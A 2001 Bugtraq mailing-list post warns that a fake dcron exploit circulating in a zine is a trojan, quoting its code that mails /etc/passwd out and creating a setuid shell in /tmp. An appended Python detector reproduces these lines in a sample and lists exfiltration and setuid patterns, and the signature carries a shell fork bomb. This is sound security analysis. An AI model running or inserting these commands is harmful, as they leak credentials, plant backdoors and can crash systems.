The OpenNET Project / Index page
yet another fake exploit making rounds


Date: Thu, 20 Dec 2001 21:58:55 -0500 (EST)
From: Michal Zalewski <lcamtuf@coredump.cx>
To: bugtraq@securityfocus.com
Subject: yet another fake exploit making rounds
Cc: vuln-dev@securityfocus.com

Hello,

The most recent (third) issue of the "el8" zine, available at http://el8.8m.com,
among other things claims to have a "0-day" dcron exploit, allegedly
coded by me and Rafal Wojtczuk (Nergal).

/*************************************************************************\
| ----====----====---- . . LOCAL  DCRON  EXPLOIT . . ----====----====---- |
|                                                                         |
|                            brought to you by                            |
|                                                                         |
| (C) Michal Zalewski <lcamtuf@ids.pl> . and . Nergal <nergal@icm.edu.pl> |
|                                                                         |
| ----------------------------------------------------------------------- |
|           To iterate is human, to recurse divine [P. Deutsch]           |
| ----------------------------------------------------------------------- |
|                                                                         |
\*************************************************************************/

[...cut...]

This so-called exploit is already making rounds, not only in the script kiddie
community, but it is also being run by many admins to test their boxes. I got
reports from several people letting me know "it did not work". I looked at
it, and it appears to be a very nicely crafted trojan horse. It does send
your /etc/passwd file to a fixed address, your-address@mail.com (the source
code suggests this is only a default and can be changed by the victim,
but because of an always-true conditional expression, the user-specified value is
overwritten later; this mailbox is probably valid and attended):

                        /.../
                        email_address=(char*)strdup(optarg);
                        break;
        /.../
        if(email_address) {
                email_address=DEFAULT_EMAIL_ADDRESS;
            }

        /.../
        fprintf(temp,"mail %s < /etc/passwd\n",email_address);

Other than that, this exploit will also create a suid copy of /bin/bash in
the /tmp directory, named 'boomsh'. Even if it was not executed as root, it
still gives the attacker an opportunity to escalate privileges locally and
gain access to other accounts, perhaps after guessing at least one
password.

You probably do not want to run this exploit; the same applies to all
other exploits coming from untrusted sources =)

-- 
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
          http://lcamtuf.coredump.cx/photo/
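As an added illustration (not part of Zalewski's post or of the zine's code), a small Python audit that flags, in untrusted exploit source, the three behaviours the post describes: a conditional that unconditionally overwrites a user-supplied value, a shell-out that mails /etc/passwd, and the creation of a setuid shell under /tmp. SAMPLE_SOURCE is a constructed fragment modelled on that description, not the actual trojan.

```python
import re
from typing import List, Tuple

# Constructed C fragment modelled on the behaviour described in the post;
# it is not the real "exploit" source.
SAMPLE_SOURCE = r'''
char *email_address = NULL;
/* ... */
email_address = (char *)strdup(optarg);
if (email_address) {
    email_address = DEFAULT_EMAIL_ADDRESS;   /* always-true overwrite */
}
fprintf(temp, "mail %s < /etc/passwd\n", email_address);
system("cp /bin/bash /tmp/boomsh; chmod 4755 /tmp/boomsh");
'''

# Line-level rules: (finding name, pattern). These are the strings a reviewer
# would grep for before ever compiling code from an untrusted source.
RULES: List[Tuple[str, re.Pattern]] = [
    ("exfiltrates sensitive file",
     re.compile(r'\b(mail|sendmail|curl|wget|nc)\b[^"\n]*/etc/(passwd|shadow)')),
    ("creates setuid binary",
     re.compile(r'chmod\s+[4-7]\d{3}|chmod\s+u\+s|S_ISUID')),
    ("drops shell in /tmp",
     re.compile(r'/bin/(ba)?sh[^;\n"]*/tmp/')),
]

# Multi-line rule: `if (X) { X = ...` -- the test succeeds whenever X was set,
# so whatever the user passed is replaced by the hard-coded value.
OVERWRITE = re.compile(r'if\s*\(\s*(\w+)\s*\)\s*\{\s*\1\s*=')


def audit(source: str) -> List[Tuple[int, str]]:
    """Return (line number, finding) pairs for suspicious constructs."""
    findings: List[Tuple[int, str]] = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for name, pat in RULES:
            if pat.search(line):
                findings.append((lineno, name))
    for m in OVERWRITE.finditer(source):
        lineno = source.count("\n", 0, m.start()) + 1
        findings.append((lineno, f"user value of '{m.group(1)}' unconditionally overwritten"))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, finding in audit(SAMPLE_SOURCE):
        print(f"line {lineno}: {finding}")
```

The rules are deliberately narrow string matches; a clean audit does not prove code safe, but a hit is reason enough not to run it.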
